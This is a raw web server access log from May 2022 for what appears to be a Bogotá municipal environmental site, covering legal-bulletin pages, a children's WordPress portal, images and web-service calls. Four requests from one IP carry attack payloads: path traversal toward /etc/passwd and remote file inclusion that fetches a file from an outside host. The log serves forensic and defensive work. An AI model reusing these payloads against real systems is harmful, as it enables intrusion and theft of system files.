190.24.40.127 - - [17/May/2022:21:08:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.40.127 - - [17/May/2022:21:08:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 21673
69.171.251.8 - - [17/May/2022:21:08:42 -0500] "GET /images/ptar-alcaldesa-rio-bogota-12-mato.jpg HTTP/1.1" 200 40205
173.252.95.20 - - [17/May/2022:21:09:12 -0500] "GET /images/eficiencia-energetica-11-marzo.jpg HTTP/1.1" 200 46478
172.22.2.4 - - [17/May/2022:21:08:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.64 - - [17/May/2022:21:10:00 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/May/2022:21:08:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [17/May/2022:21:12:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/May/2022:21:13:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/May/2022:21:14:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
216.245.221.92 - - [17/May/2022:21:17:28 -0500] "HEAD / HTTP/1.1" 200 -
44.200.48.163 - - [17/May/2022:21:18:14 -0500] "HEAD /se-aproxima-nueva-jornada-de-recoleccion-masiva-de-residuos-especiales-y-peligrosos-en-bogota.html HTTP/1.1" 200 -
40.77.188.10 - - [17/May/2022:21:19:45 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
40.77.189.236 - - [17/May/2022:21:19:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
40.77.188.98 - - [17/May/2022:21:19:47 -0500] "GET /portaldeninos/wp-includes/js/comment-reply.min.js?ver=4.9.8 HTTP/1.1" 200 1078
40.77.189.201 - - [17/May/2022:21:19:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
172.22.2.4 - - [17/May/2022:21:19:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/May/2022:21:20:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [17/May/2022:21:22:28 -0500] "HEAD / HTTP/1.1" 200 -
31.13.103.1 - - [17/May/2022:21:22:53 -0500] "GET /images/secretaria-carolina-economia-circular-6-mayo.jpg HTTP/1.1" 200 33699
173.252.107.21 - - [17/May/2022:21:23:06 -0500] "GET /images/actividades-dia-tierra-22-abril.jpg HTTP/1.1" 200 77276
201.245.192.253 - - [17/May/2022:21:22:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46721
184.94.240.88 - - [17/May/2022:21:23:34 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [17/May/2022:21:23:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44057
31.13.127.1 - - [17/May/2022:21:25:22 -0500] "GET /en-el-dia-mundial-del-reciclaje-bogota-se-unio-a-nueva-reciclaton.html?fbclid=IwAR3chX_TOMM16BnfnimD5CsYAtQRasmUyT6Hc7Cy8p-PLltsBI8CT4_U4hg HTTP/1.1" 200 802
173.252.87.7 - - [17/May/2022:21:26:29 -0500] "GET /en-el-dia-mundial-del-reciclaje-bogota-se-unio-a-nueva-reciclaton.html?fbclid=IwAR2Y_nOIBfsuWSmTJreKYlhfr1liB9IKayyWfFLceJjmcuakLFWegxQ-85Y HTTP/1.1" 200 802
172.22.2.4 - - [17/May/2022:21:25:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [17/May/2022:21:27:28 -0500] "HEAD / HTTP/1.1" 200 -
172.225.153.45 - - [17/May/2022:21:27:50 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [17/May/2022:21:26:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
157.55.39.8 - - [17/May/2022:21:32:22 -0500] "GET /forest/ HTTP/1.1" 200 12041
216.245.221.92 - - [17/May/2022:21:32:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [17/May/2022:21:33:00 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [17/May/2022:21:33:00 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [17/May/2022:21:33:00 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [17/May/2022:21:33:00 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [17/May/2022:21:33:00 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [17/May/2022:21:33:00 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [17/May/2022:21:33:00 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [17/May/2022:21:33:02 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [17/May/2022:21:31:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/May/2022:21:33:08 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [17/May/2022:21:33:08 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [17/May/2022:21:33:08 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [17/May/2022:21:33:08 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [17/May/2022:21:33:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1540&usuario=&sector=SILVICULTURA&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [17/May/2022:21:33:17 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
201.245.192.253 - - [17/May/2022:21:32:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46721
172.22.2.4 - - [17/May/2022:21:33:22 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1540&usuario=&sector=SILVICULTURA&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [17/May/2022:21:32:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
201.245.192.253 - - [17/May/2022:21:33:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44057
31.148.131.212 - - [17/May/2022:21:34:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0286.pdf HTTP/1.1" 200 341129
172.22.2.4 - - [17/May/2022:21:32:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
93.174.89.131 - - [17/May/2022:21:36:19 -0500] "GET /autoliquidacion2020/index.php?dir=../../../../../../../../../../../../etc/passwd%00+del+aire+auditiva+y+visual-%2F HTTP/1.1" 200 6371
93.174.89.131 - - [17/May/2022:21:36:20 -0500] "GET /autoliquidacion2020/index.php?dir=../../../../../../../../../../../../etc/passwd+del+aire+auditiva+y+visual-%2F HTTP/1.1" 200 6371
93.174.89.131 - - [17/May/2022:21:36:21 -0500] "GET /autoliquidacion2020/index.php?dir=http://cdn.privdayz.com/txt/privpass.txt?+del+aire+auditiva+y+visual-%2F HTTP/1.1" 200 6550
93.174.89.131 - - [17/May/2022:21:36:22 -0500] "GET /autoliquidacion2020/index.php?dir=http://cdn.privdayz.com/txt/privpass.txt+del+aire+auditiva+y+visual-%2F HTTP/1.1" 200 6547
216.245.221.92 - - [17/May/2022:21:37:28 -0500] "HEAD / HTTP/1.1" 200 -
39.70.14.18 - - [17/May/2022:21:37:32 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
39.70.14.18 - - [17/May/2022:21:37:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
39.70.14.18 - - [17/May/2022:21:37:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
39.70.14.18 - - [17/May/2022:21:37:32 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
39.70.14.18 - - [17/May/2022:21:37:32 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
39.70.14.18 - - [17/May/2022:21:37:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
39.70.14.18 - - [17/May/2022:21:37:34 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
39.70.14.18 - - [17/May/2022:21:37:35 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
39.70.14.18 - - [17/May/2022:21:37:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
39.70.14.18 - - [17/May/2022:21:37:35 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
39.70.14.18 - - [17/May/2022:21:37:36 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
39.70.14.18 - - [17/May/2022:21:37:36 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
39.70.14.18 - - [17/May/2022:21:37:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
39.70.14.18 - - [17/May/2022:21:37:36 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
39.70.14.18 - - [17/May/2022:21:37:36 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
39.70.14.18 - - [17/May/2022:21:37:37 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
39.70.14.18 - - [17/May/2022:21:37:35 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
39.70.14.18 - - [17/May/2022:21:37:36 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
39.70.14.18 - - [17/May/2022:21:37:37 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
39.70.14.18 - - [17/May/2022:21:37:37 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
39.70.14.18 - - [17/May/2022:21:37:37 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
39.70.14.18 - - [17/May/2022:21:37:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
39.70.14.18 - - [17/May/2022:21:37:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
39.70.14.18 - - [17/May/2022:21:37:35 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
39.70.14.18 - - [17/May/2022:21:37:38 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
39.70.14.18 - - [17/May/2022:21:37:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
39.70.14.18 - - [17/May/2022:21:37:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
39.70.14.18 - - [17/May/2022:21:37:39 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
39.70.14.18 - - [17/May/2022:21:37:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
39.70.14.18 - - [17/May/2022:21:37:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
39.70.14.18 - - [17/May/2022:21:37:44 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 14625
172.22.2.4 - - [17/May/2022:21:36:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57542
39.70.14.18 - - [17/May/2022:21:37:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 96544
172.22.2.4 - - [17/May/2022:21:37:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
54.39.104.161 - - [17/May/2022:21:39:05 -0500] "GET /en-el-dia-mundial-del-reciclaje-bogota-se-unio-a-nueva-reciclaton.html HTTP/1.1" 200 802
172.22.2.4 - - [17/May/2022:21:38:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
172.22.2.4 - - [17/May/2022:21:39:50 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [17/May/2022:21:39:54 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [17/May/2022:21:40:03 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
186.84.90.136 - - [17/May/2022:21:40:14 -0500] "GET /si-te-gusta-la-pintura-el-dibujo-o-la-fotografia-el-concurso-a-vuelo-de-pajaro-es-para-ti.html HTTP/1.1" 200 861
186.84.90.91 - - [17/May/2022:21:40:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19q9FtZoHCgLqBgRCA0t2ug//kHQksxsrIYepKs7cnC1ShWqEMtZne3mcclA2A3qP1UoHdJJ/uD47ql6vpICgC00vJR6Esa69oMybfET2+v3y1DcPv3ZmVHkTS7EU2r/I7fnniw9z0k3lo0tqU+b8H9jeSVbG6P3TtLKVHozSNH/hibAIlSbXaMRJHduSyyyNfBbFr+KdmVsN076+g5lVB1Wi+eJlkYDopV9Ub96LM06vMt0MG/+uEzwMPi/UTzzjwbQ0t8t7WjYQ==&u=U2FsdGVkX1+oHJav+4xPG5v/7/XP8LQcPF7mNbHeIRk=&y=U2FsdGVkX1+aajMK0xNiv6E4NaQRd3DRdtGa8fpzzTO0wf2S5kEaBDZGvhTgVk8w HTTP/1.1" 200 25
186.84.90.91 - - [17/May/2022:21:40:37 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1+oHJav+4xPG5v/7/XP8LQcPF7mNbHeIRk=&y=U2FsdGVkX1+aajMK0xNiv6E4NaQRd3DRdtGa8fpzzTO0wf2S5kEaBDZGvhTgVk8w HTTP/1.1" 200 25
186.84.90.91 - - [17/May/2022:21:40:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18ffO6zhEhQliQdR/4sh+KDyWhZzEDc9xqJgIXpYm47YcUE032/DooQ3P6P6KFuERIxGmXstkx9tAPLEDHcX4r1LIhF1lHyWvhUtcs6Ic3FHx/CX4B0xS5yXlsVhQ8D8w2B8JTiQiPSdUHwNLchfaVc57k6xQDHGCw=&u=U2FsdGVkX1+oHJav+4xPG5v/7/XP8LQcPF7mNbHeIRk=&y=U2FsdGVkX1+aajMK0xNiv6E4NaQRd3DRdtGa8fpzzTO0wf2S5kEaBDZGvhTgVk8w HTTP/1.1" 200 25
186.84.90.91 - - [17/May/2022:21:40:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/WKOoamYyl72i2FZ+KNDLXLX85CrL/P5bPyvL+0O860LkzWRfiEm3hF+lxtSF7T9FwxiKZqnss/EfXIbOEinpo0BqT7wAa3Ucz1PB+x/h0/ViikTpOWaDD7js9no8GiByARB42BXRZjGE891GpoWx9JyhZ9T/FU8Y=&u=U2FsdGVkX1+oHJav+4xPG5v/7/XP8LQcPF7mNbHeIRk=&y=U2FsdGVkX1+aajMK0xNiv6E4NaQRd3DRdtGa8fpzzTO0wf2S5kEaBDZGvhTgVk8w HTTP/1.1" 200 25
186.84.90.91 - - [17/May/2022:21:40:37 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18ve71IPq121cDd6VNlL5JtawFAhZE5M3VcdMgzsShzgernKQVxItynq5LZpKYMpnsgzLEbJFFu6gkTx7fRlabG7UEs2YnW4ipT1uL8K1M7nDh2iOuIjuAbWxpPsFkYYEJN7BslCcju8ldMWVLK8mf55OZOFNqR8Cs=&u=U2FsdGVkX1+oHJav+4xPG5v/7/XP8LQcPF7mNbHeIRk=&y=U2FsdGVkX1+aajMK0xNiv6E4NaQRd3DRdtGa8fpzzTO0wf2S5kEaBDZGvhTgVk8w HTTP/1.1" 200 25
